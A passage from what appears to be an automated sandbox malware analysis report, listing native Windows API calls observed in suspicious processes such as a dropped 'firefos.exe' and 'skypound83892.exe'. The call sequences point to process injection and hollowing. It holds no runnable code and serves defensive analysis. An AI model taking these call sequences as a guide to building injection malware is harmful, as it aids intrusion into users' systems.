          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FD8C NtDelayExecution,LdrInitializeThunk,12_2_0213FD8C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FDC0 NtQuerySystemInformation,LdrInitializeThunk,12_2_0213FDC0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02140048 NtProtectVirtualMemory,12_2_02140048
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02140078 NtResumeThread,12_2_02140078
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02140060 NtQuerySection,12_2_02140060
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021410D0 NtOpenProcessToken,12_2_021410D0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214010C NtOpenDirectoryObject,12_2_0214010C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02141148 NtOpenThread,12_2_02141148
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021401D4 NtSetValueKey,12_2_021401D4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FA20 NtQueryInformationFile,12_2_0213FA20
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FA50 NtEnumerateValueKey,12_2_0213FA50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FBE8 NtQueryVirtualMemory,12_2_0213FBE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213F8CC NtWaitForSingleObject,12_2_0213F8CC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02141930 NtSetContextThread,12_2_02141930
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213F938 NtWriteFile,12_2_0213F938
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FE24 NtWriteVirtualMemory,12_2_0213FE24
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FEA0 NtReadVirtualMemory,12_2_0213FEA0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FF34 NtQueueApcThread,12_2_0213FF34
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FFFC NtCreateProcessEx,12_2_0213FFFC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FC30 NtOpenProcess,12_2_0213FC30
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02140C40 NtGetContextThread,12_2_02140C40
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FC48 NtSetInformationFile,12_2_0213FC48
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FC90 NtUnmapViewOfSection,12_2_0213FC90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FD5C NtEnumerateKey,12_2_0213FD5C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02141D80 NtSuspendThread,12_2_02141D80
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001381C0 NtCreateFile,12_2_001381C0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00138270 NtReadFile,12_2_00138270
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001382F0 NtClose,12_2_001382F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001383A0 NtAllocateVirtualMemory,12_2_001383A0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001381BB NtCreateFile,12_2_001381BB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013826B NtReadFile,12_2_0013826B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001382EA NtClose,12_2_001382EA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013839D NtAllocateVirtualMemory,12_2_0013839D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B632E NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,12_2_008B632E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,12_2_008B67C7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B6332 NtCreateSection,NtMapViewOfSection,12_2_008B6332
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B67C2 NtQueryInformationProcess,12_2_008B67C2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004181C0 NtCreateFile,15_2_004181C0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00418270 NtReadFile,15_2_00418270
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004182F0 NtClose,15_2_004182F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004183A0 NtAllocateVirtualMemory,15_2_004183A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004181BB NtCreateFile,15_2_004181BB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041826B NtReadFile,15_2_0041826B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004182EA NtClose,15_2_004182EA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041839D NtAllocateVirtualMemory,15_2_0041839D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009407AC NtCreateMutant,LdrInitializeThunk,15_2_009407AC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F9F0 NtClose,LdrInitializeThunk,15_2_0093F9F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_0093FAD0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAE8 NtQueryInformationProcess,LdrInitializeThunk,15_2_0093FAE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FB68 NtFreeVirtualMemory,LdrInitializeThunk,15_2_0093FB68
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FDC0 NtQuerySystemInformation,LdrInitializeThunk,15_2_0093FDC0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_0093FED0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009410D0 NtOpenProcessToken,15_2_009410D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009400C4 NtCreateFile,15_2_009400C4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940048 NtProtectVirtualMemory,15_2_00940048
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940078 NtResumeThread,15_2_00940078
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940060 NtQuerySection,15_2_00940060
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009401D4 NtSetValueKey,15_2_009401D4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094010C NtOpenDirectoryObject,15_2_0094010C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941148 NtOpenThread,15_2_00941148
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F8CC NtWaitForSingleObject,15_2_0093F8CC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F900 NtReadFile,15_2_0093F900
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941930 NtSetContextThread,15_2_00941930
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F938 NtWriteFile,15_2_0093F938
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAB8 NtQueryValueKey,15_2_0093FAB8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FA20 NtQueryInformationFile,15_2_0093FA20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FA50 NtEnumerateValueKey,15_2_0093FA50
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FBB8 NtQueryInformationToken,15_2_0093FBB8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FBE8 NtQueryVirtualMemory,15_2_0093FBE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FB50 NtCreateKey,15_2_0093FB50
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC90 NtUnmapViewOfSection,15_2_0093FC90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC30 NtOpenProcess,15_2_0093FC30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940C40 NtGetContextThread,15_2_00940C40
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC48 NtSetInformationFile,15_2_0093FC48
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC60 NtMapViewOfSection,15_2_0093FC60
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941D80 NtSuspendThread,15_2_00941D80
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FD8C NtDelayExecution,15_2_0093FD8C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FD5C NtEnumerateKey,15_2_0093FD5C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FEA0 NtReadVirtualMemory,15_2_0093FEA0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FE24 NtWriteVirtualMemory,15_2_0093FE24
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FFB4 NtCreateSection,15_2_0093FFB4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FFFC NtCreateProcessEx,15_2_0093FFFC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FF34 NtQueueApcThread,15_2_0093FF34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B07AC NtCreateMutant,LdrInitializeThunk,16_2_008B07AC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF9F0 NtClose,LdrInitializeThunk,16_2_008AF9F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_008AFAD0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAE8 NtQueryInformationProcess,LdrInitializeThunk,16_2_008AFAE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFB68 NtFreeVirtualMemory,LdrInitializeThunk,16_2_008AFB68
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFDC0 NtQuerySystemInformation,LdrInitializeThunk,16_2_008AFDC0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_008AFED0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B00C4 NtCreateFile,16_2_008B00C4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B10D0 NtOpenProcessToken,16_2_008B10D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0048 NtProtectVirtualMemory,16_2_008B0048
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0060 NtQuerySection,16_2_008B0060
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0078 NtResumeThread,16_2_008B0078
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B01D4 NtSetValueKey,16_2_008B01D4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B010C NtOpenDirectoryObject,16_2_008B010C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1148 NtOpenThread,16_2_008B1148
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF8CC NtWaitForSingleObject,16_2_008AF8CC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF900 NtReadFile,16_2_008AF900
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF938 NtWriteFile,16_2_008AF938
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1930 NtSetContextThread,16_2_008B1930
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAB8 NtQueryValueKey,16_2_008AFAB8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFA20 NtQueryInformationFile,16_2_008AFA20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFA50 NtEnumerateValueKey,16_2_008AFA50
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFBB8 NtQueryInformationToken,16_2_008AFBB8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFBE8 NtQueryVirtualMemory,16_2_008AFBE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFB50 NtCreateKey,16_2_008AFB50
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC90 NtUnmapViewOfSection,16_2_008AFC90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC30 NtOpenProcess,16_2_008AFC30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC48 NtSetInformationFile,16_2_008AFC48
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0C40 NtGetContextThread,16_2_008B0C40
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC60 NtMapViewOfSection,16_2_008AFC60
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFD8C NtDelayExecution,16_2_008AFD8C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1D80 NtSuspendThread,16_2_008B1D80
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFD5C NtEnumerateKey,16_2_008AFD5C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFEA0 NtReadVirtualMemory,16_2_008AFEA0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFE24 NtWriteVirtualMemory,16_2_008AFE24
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFFB4 NtCreateSection,16_2_008AFFB4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFFFC NtCreateProcessEx,16_2_008AFFFC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFF34 NtQueueApcThread,16_2_008AFF34
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041BA026_2_0041BA02
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00408C606_2_00408C60
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B4A36_2_0041B4A3
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041CD3A6_2_0041CD3A
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00402D876_2_00402D87
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041BFCC6_2_0041BFCC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094E0C66_2_0094E0C6
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0097D0056_2_0097D005
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0096905A6_2_0096905A
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009530406_2_00953040
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009CD06D6_2_009CD06D
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009DD13F6_2_009DD13F
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094E2E96_2_0094E2E9
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F12386_2_009F1238
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F63BF6_2_009F63BF
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009763DB6_2_009763DB
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094F3CF6_2_0094F3CF
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009523056_2_00952305
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009573536_2_00957353
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0099A37B6_2_0099A37B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009854856_2_00985485
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009614896_2_00961489
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D443E6_2_009D443E
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0098D47D6_2_0098D47D
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F35DA6_2_009F35DA
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0096C5F06_2_0096C5F0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D05E36_2_009D05E3
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095351F6_2_0095351F
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009965406_2_00996540
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009546806_2_00954680
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095E6C16_2_0095E6C1
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0099A6346_2_0099A634
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F26226_2_009F2622
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D579A6_2_009D579A
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095C7BC6_2_0095C7BC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009857C36_2_009857C3
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009CF8C46_2_009CF8C4
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009EF8EE6_2_009EF8EE
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095C85C6_2_0095C85C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0097286D6_2_0097286D
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F098E6_2_009F098E
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009529B26_2_009529B2
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009669FE6_2_009669FE
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009E49F56_2_009E49F5
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D59556_2_009D5955
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D394B6_2_009D394B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00A03A836_2_00A03A83
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009FCBA46_2_009FCBA4
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094FBD76_2_0094FBD7
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009DDBDA6_2_009DDBDA
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D6BCB6_2_009D6BCB
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00977B006_2_00977B00
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F2C9C6_2_009F2C9C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009DAC5E6_2_009DAC5E
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009EFDDD6_2_009EFDDD
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00980D3B6_2_00980D3B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095CD5B6_2_0095CD5B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00982E2F6_2_00982E2F
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0096EE4C6_2_0096EE4C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009ECFB16_2_009ECFB1
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009C2FDC6_2_009C2FDC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009DBF146_2_009DBF14
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00960F3F6_2_00960F3F
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0097DF7C6_2_0097DF7C
          Source: C:\Windows\explorer.exeCode function: 7_2_0292B8F97_2_0292B8F9
          Source: C:\Windows\explorer.exeCode function: 7_2_0292E2FF7_2_0292E2FF
          Source: C:\Windows\explorer.exeCode function: 7_2_029300627_2_02930062
          Source: C:\Windows\explorer.exeCode function: 7_2_029325B27_2_029325B2
          Source: C:\Windows\explorer.exeCode function: 7_2_029317C77_2_029317C7
          Source: C:\Windows\explorer.exeCode function: 7_2_0292B9027_2_0292B902
          Source: C:\Windows\explorer.exeCode function: 7_2_0292E3027_2_0292E302
          Source: C:\Windows\explorer.exeCode function: 7_2_0292C3627_2_0292C362
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021F123812_2_021F1238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214E2E912_2_0214E2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215230512_2_02152305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215735312_2_02157353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0219A37B12_2_0219A37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021F63BF12_2_021F63BF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021763DB12_2_021763DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214F3CF12_2_0214F3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0217D00512_2_0217D005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0216905A12_2_0216905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215304012_2_02153040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021CD06D12_2_021CD06D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214E0C612_2_0214E0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0219A63412_2_0219A634
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021F262212_2_021F2622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215468012_2_02154680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215E6C112_2_0215E6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D579A12_2_021D579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215C7BC12_2_0215C7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021857C312_2_021857C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D443E12_2_021D443E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0218D47D12_2_0218D47D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0218548512_2_02185485
